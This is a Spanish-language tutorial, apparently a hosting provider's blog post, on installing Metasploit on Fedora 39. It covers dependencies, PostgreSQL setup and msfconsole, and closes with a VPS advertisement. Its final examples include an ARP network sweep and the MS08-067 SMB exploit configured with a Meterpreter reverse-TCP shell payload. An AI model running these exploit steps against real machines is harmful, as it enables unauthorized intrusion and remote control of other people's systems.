Metasploit es una plataforma de código abierto utilizada para el desarrollo y ejecución de exploits contra una máquina remota. Es una herramienta fundamental para profesionales de la seguridad informática y pentesters. En este artículo, te mostraremos cómo instalar Metasploit en Fedora 39 paso a paso. Este tutorial está diseñado para ser técnico pero accesible para los recién llegados.
Requisitos Previos
Antes de comenzar, asegúrate de tener lo siguiente:
- Un sistema Fedora 39 instalado.
- Acceso a una cuenta con privilegios de superusuario (root) o acceso a
sudo
. - Conocimientos básicos de la línea de comandos.
Paso 1: Actualizar el Sistema
Primero, asegúrate de que tu sistema esté actualizado. Abre una terminal y ejecuta los siguientes comandos:
sudo dnf update -y
Paso 2: Instalar Dependencias
Metasploit requiere varias dependencias para funcionar correctamente. Instálalas con el siguiente comando:
sudo dnf install wget curl git postgresql postgresql-server postgresql-contrib ruby ruby-devel libpcap-devel libpq-devel -y
Paso 3: Configurar PostgreSQL
Metasploit utiliza PostgreSQL como su base de datos. Configura PostgreSQL con los siguientes pasos:
Iniciar el Servicio PostgreSQL
Inicia y habilita el servicio de PostgreSQL:
sudo systemctl start postgresql
sudo systemctl enable postgresql
Configurar la Base de Datos
Crea un nuevo usuario y una base de datos para Metasploit:
sudo -u postgres createuser msf
sudo -u postgres createdb msf_database
Configura una contraseña para el usuario msf
:
sudo -u postgres psql
\password msf
Sal del shell de PostgreSQL:
\q
Paso 4: Descargar e Instalar Metasploit
Descarga Metasploit desde el repositorio oficial de GitHub:
cd /opt
sudo git clone https://github.com/rapid7/metasploit-framework.git
cd metasploit-framework
Instala las gemas de Ruby necesarias:
sudo gem install bundler
bundle install
Paso 5: Configurar Metasploit
Configurar la Base de Datos
Configura Metasploit para usar la base de datos PostgreSQL que creaste anteriormente. Crea un archivo de configuración database.yml
:
nano config/database.yml
Añade el siguiente contenido, reemplazando password
con la contraseña que configuraste para el usuario msf
:
production:
adapter: postgresql
database: msf_database
username: msf
password: password
host: 127.0.0.1
port: 5432
pool: 5
timeout: 5
Guarda el archivo y cierra el editor.
Inicializar la Base de Datos
Inicializa la base de datos de Metasploit:
./msfdb init
Paso 6: Ejecutar Metasploit
Para iniciar Metasploit, usa el siguiente comando:
./msfconsole
Deberías ver la consola de Metasploit, lo que indica que la instalación fue exitosa.
Ejemplos Prácticos
Escanear una Red
Para escanear una red, puedes usar el siguiente módulo de Metasploit. Primero, inicia Metasploit:
./msfconsole
Carga el módulo de escaneo:
use auxiliary/scanner/discovery/arp_sweep
Configura la red objetivo (reemplaza 192.168.1.0/24
con tu red objetivo):
set RHOSTS 192.168.1.0/24
Ejecuta el escaneo:
run
Exploitar una Vulnerabilidad
Como ejemplo, usaremos el módulo exploit/windows/smb/ms08_067_netapi
, que explota una vulnerabilidad en el servicio SMB de Windows. Primero, carga el módulo:
use exploit/windows/smb/ms08_067_netapi
Configura la dirección IP del objetivo (reemplaza 192.168.1.10
con la IP de tu objetivo):
set RHOST 192.168.1.10
Configura el payload:
set payload windows/meterpreter/reverse_tcp
set LHOST 192.168.1.5 # Reemplaza con tu IP
set LPORT 4444
Ejecuta el exploit:
run
Para mejorar el rendimiento y la gestión de tus proyectos de seguridad y pruebas de penetración con Metasploit, considera utilizar los servicios de Shape.host. Ofrecen soluciones de Linux SSD VPS que proporcionan escalabilidad, alta disponibilidad y un rendimiento superior para tus herramientas de seguridad. Con Shape.host, puedes asegurarte de que tu infraestructura esté siempre disponible y funcionando de manera óptima.